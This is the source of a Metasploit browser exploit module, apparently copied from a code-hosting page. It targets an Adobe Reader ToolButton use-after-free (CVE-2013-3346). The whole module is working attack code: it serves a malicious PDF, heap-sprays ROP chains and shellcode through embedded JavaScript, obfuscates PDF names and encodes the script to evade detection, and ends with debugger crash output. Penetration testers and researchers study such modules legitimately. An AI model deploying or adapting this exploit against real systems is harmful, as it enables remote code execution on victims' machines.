Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::BrowserExploitServer
10

11
  def initialize(info={})
12
    super(update_info(info,
13
      'Name'           => "Adobe Reader ToolButton Use After Free",
14
      'Description'    => %q{
15
        This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6
16
        and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where
17
        the cEnable callback can be used to early free the object memory. Later use of the object
18
        allows triggering the use after free condition. This module has been tested successfully
19
        on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in
20
        November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order
21
        to exploit Adobe Reader 9 the fileformat version of the exploit can be used.
22
      },
23
      'License'        => MSF_LICENSE,
24
      'Author'         =>
25
        [
26
          'Soroush Dalili', # Vulnerability discovery
27
          'Unknown', # Exploit in the wild
28
          'sinn3r', # Metasploit module
29
          'juan vazquez' # Metasploit module
30
        ],
31
      'References'     =>
32
        [
33
          [ 'CVE', '2013-3346' ],
34
          [ 'OSVDB', '96745' ],
35
          [ 'ZDI', '13-212' ],
36
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],
37
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]
38
        ],
39
      'Platform'       => 'win',
40
      'Arch'           => ARCH_X86,
41
      'Payload'        =>
42
        {
43
          'Space'    => 1024,
44
          'BadChars' => "\x00",
45
          'DisableNops' => true
46
        },
47
      'BrowserRequirements' =>
48
        {
49
          :source      => /script|headers/i,
50
          :os_name     => OperatingSystems::Match::WINDOWS_XP,
51
          :ua_name     => Msf::HttpClients::IE
52
        },
53
      'Targets'        =>
54
        [
55
          [ 'Windows XP / IE / Adobe Reader 10/11', { } ],
56
        ],
57
      'Privileged'     => false,
58
      'DisclosureDate' => '2013-08-08',
59
      'DefaultTarget'  => 0))
60

61
  end
62

63
  def on_request_exploit(cli, request, target_info)
64
    print_status("request: #{request.uri}")
65
    js_data = make_js(cli, target_info)
66
    # Create the pdf
67
    pdf = make_pdf(js_data)
68
    print_status("Sending PDF...")
69
    send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })
70
  end
71

72
  def make_js(cli, target_info)
73
    # CreateFileMappingA + MapViewOfFile + memcpy rop chain
74
    rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
75
    rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
76
    escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))
77

78
    js = %Q|
79
function heapSpray(str, str_addr, r_addr) {
80
  var aaa = unescape("%u0c0c");
81
  aaa += aaa;
82
  while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;
83
  var i1 = r_addr - 0x24;
84
  var bbb = aaa.substring(0, i1 / 2);
85
  var sa = str_addr;
86
  while (sa.length < (0x0c0c - r_addr)) sa += sa;
87
  bbb += sa;
88
  bbb += aaa;
89
  var i11 = 0x0c0c - 0x24;
90
  bbb = bbb.substring(0, i11 / 2);
91
  bbb += str;
92
  bbb += aaa;
93
  var i2 = 0x4000 + 0xc000;
94
  var ccc = bbb.substring(0, i2 / 2);
95
  while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;
96
  var i3 = (0x1020 - 0x08) / 2;
97
  var ddd = ccc.substring(0, 0x80000 - i3);
98
  var eee = new Array();
99
  for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";
100
  return;
101
}
102
var shellcode = unescape("#{escaped_payload}");
103
var executable = "";
104
var rop10 = unescape("#{rop_10}");
105
var rop11 = unescape("#{rop_11}");
106
var r11 = false;
107
var vulnerable = true;
108

109
var obj_size;
110
var rop;
111
var ret_addr;
112
var rop_addr;
113
var r_addr;
114

115
if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {
116
  obj_size = 0x360 + 0x1c;
117
  rop = rop10;
118
  rop_addr = unescape("%u08e4%u0c0c");
119
  r_addr = 0x08e4;
120
  ret_addr = unescape("%ua8df%u4a82");
121
} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {
122
  r11 = true;
123
  obj_size = 0x370;
124
  rop = rop11;
125
  rop_addr = unescape("%u08a8%u0c0c");
126
  r_addr = 0x08a8;
127
  ret_addr = unescape("%u8003%u4a84");
128
} else {
129
  vulnerable = false;
130
}
131

132
if (vulnerable) {
133
  var payload = rop + shellcode;
134
  heapSpray(payload, ret_addr, r_addr);
135

136
  var part1 = "";
137
  if (!r11) {
138
    for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141");
139
  }
140
  part1 += rop_addr;
141
  var part2 = "";
142
  var part2_len = obj_size - part1.length * 2;
143
  for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141");
144
  var arr = new Array();
145

146
  removeButtonFunc = function () {
147
    app.removeToolButton({
148
        cName: "evil"
149
    });
150

151
    for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);
152
  }
153

154
  addButtonFunc = function () {
155
    app.addToolButton({
156
      cName: "xxx",
157
      cExec: "1",
158
      cEnable: "removeButtonFunc();"
159
    });
160
  }
161

162
  app.addToolButton({
163
    cName: "evil",
164
    cExec: "1",
165
    cEnable: "addButtonFunc();"
166
  });
167
}
168
|
169

170
    js
171
  end
172

173
  def random_non_ascii_string(count)
174
    result = ""
175
    count.times do
176
      result << (rand(128) + 128).chr
177
    end
178
    result
179
  end
180

181
  def io_def(id)
182
    "%d 0 obj \n" % id
183
  end
184

185
  def io_ref(id)
186
    "%d 0 R" % id
187
  end
188

189

190
  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
191
  def n_obfu(str)
192
    #return str
193
    result = ""
194
    str.scan(/./u) do |c|
195
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
196
        result << "#%x" % c.unpack("C*")[0]
197
      else
198
        result << c
199
      end
200
    end
201
    result
202
  end
203

204

205
  def ascii_hex_whitespace_encode(str)
206
    result = ""
207
    whitespace = ""
208
    str.each_byte do |b|
209
      result << whitespace << "%02x" % b
210
      whitespace = " " * (rand(3) + 1)
211
    end
212
    result << ">"
213
  end
214

215

216
  def make_pdf(js)
217
    xref = []
218
    eol = "\n"
219
    endobj = "endobj" << eol
220

221
    # Randomize PDF version?
222
    pdf = "%PDF-1.5" << eol
223
    pdf << "%" << random_non_ascii_string(4) << eol
224

225
    # catalog
226
    xref << pdf.length
227
    pdf << io_def(1) << n_obfu("<<") << eol
228
    pdf << n_obfu("/Pages ") << io_ref(2) << eol
229
    pdf << n_obfu("/Type /Catalog") << eol
230
    pdf << n_obfu("/OpenAction ") << io_ref(4) << eol
231
    # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load
232
    pdf << n_obfu("/AcroForm ") << io_ref(6) << eol
233
    pdf << n_obfu(">>") << eol
234
    pdf << endobj
235

236
    # pages array
237
    xref << pdf.length
238
    pdf << io_def(2) << n_obfu("<<") << eol
239
    pdf << n_obfu("/Kids [") << io_ref(3) << "]" << eol
240
    pdf << n_obfu("/Count 1") << eol
241
    pdf << n_obfu("/Type /Pages") << eol
242
    pdf << n_obfu(">>") << eol
243
    pdf << endobj
244

245
    # page 1
246
    xref << pdf.length
247
    pdf << io_def(3) << n_obfu("<<") << eol
248
    pdf << n_obfu("/Parent ") << io_ref(2) << eol
249
    pdf << n_obfu("/Type /Page") << eol
250
    pdf << n_obfu(">>") << eol # end obj dict
251
    pdf << endobj
252

253
    # js action
254
    xref << pdf.length
255
    pdf << io_def(4) << n_obfu("<<")
256
    pdf << n_obfu("/Type/Action/S/JavaScript/JS ") + io_ref(5)
257
    pdf << n_obfu(">>") << eol
258
    pdf << endobj
259

260
    # js stream
261
    xref << pdf.length
262
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
263
    pdf << io_def(5) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
264
    pdf << "stream" << eol
265
    pdf << compressed << eol
266
    pdf << "endstream" << eol
267
    pdf << endobj
268

269
    ###
270
    # The following form related data is required to get icucnv36.dll / icucnv40.dll to load
271
    ###
272

273
    # form object
274
    xref << pdf.length
275
    pdf << io_def(6)
276
    pdf << n_obfu("<</XFA ") << io_ref(7) << n_obfu(">>") << eol
277
    pdf << endobj
278

279
    # form stream
280
    xfa = <<-EOF
281
<?xml version="1.0" encoding="UTF-8"?>
282
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
283
<config xmlns="http://www.xfa.org/schema/xci/2.6/">
284
<present><pdf><interactive>1</interactive></pdf></present>
285
</config>
286
<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
287
<subform name="form1" layout="tb" locale="en_US">
288
<pageSet></pageSet>
289
</subform></template></xdp:xdp>
290
    EOF
291

292
    xref << pdf.length
293
    pdf << io_def(7) << n_obfu("<</Length %s>>" % xfa.length) << eol
294
    pdf << "stream" << eol
295
    pdf << xfa << eol
296
    pdf << "endstream" << eol
297
    pdf << endobj
298

299
    ###
300
    # end form stuff for icucnv36.dll / icucnv40.dll
301
    ###
302

303

304
    # trailing stuff
305
    xrefPosition = pdf.length
306
    pdf << "xref" << eol
307
    pdf << "0 %d" % (xref.length + 1) << eol
308
    pdf << "0000000000 65535 f" << eol
309
    xref.each do |index|
310
      pdf << "%010d 00000 n" % index << eol
311
    end
312

313
    pdf << "trailer" << eol
314
    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
315

316
    pdf << "startxref" << eol
317
    pdf << xrefPosition.to_s() << eol
318

319
    pdf << "%%EOF" << eol
320
    pdf
321
  end
322
end
323

324

325
=begin
326

327
* crash Adobe Reader 10.1.4
328

329
First chance exceptions are reported before any exception handling.
330
This exception may be expected and handled.
331
eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001
332
eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0         nv up ei pl nz ac po cy
333
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010213
334
AcroRd32_60000000!PDFLTerm+0xbb7cd:
335
604d3a4d ff9028030000    call    dword ptr [eax+328h] ds:0023:0c0c0c0c=????????
336

337
* crash Adobe Reader 11.0.2
338

339
(940.d70): Access violation - code c0000005 (first chance)
340
First chance exceptions are reported before any exception handling.
341
This exception may be expected and handled.
342
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll -
343
eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000
344
eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0         nv up ei pl nz ac po cy
345
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210213
346
AcroRd32_60000000!DllCanUnloadNow+0x1493ae:
347
60197b9b ff9064030000    call    dword ptr [eax+364h] ds:0023:0c0c0c0c=????????
348

349
=end
350

351

352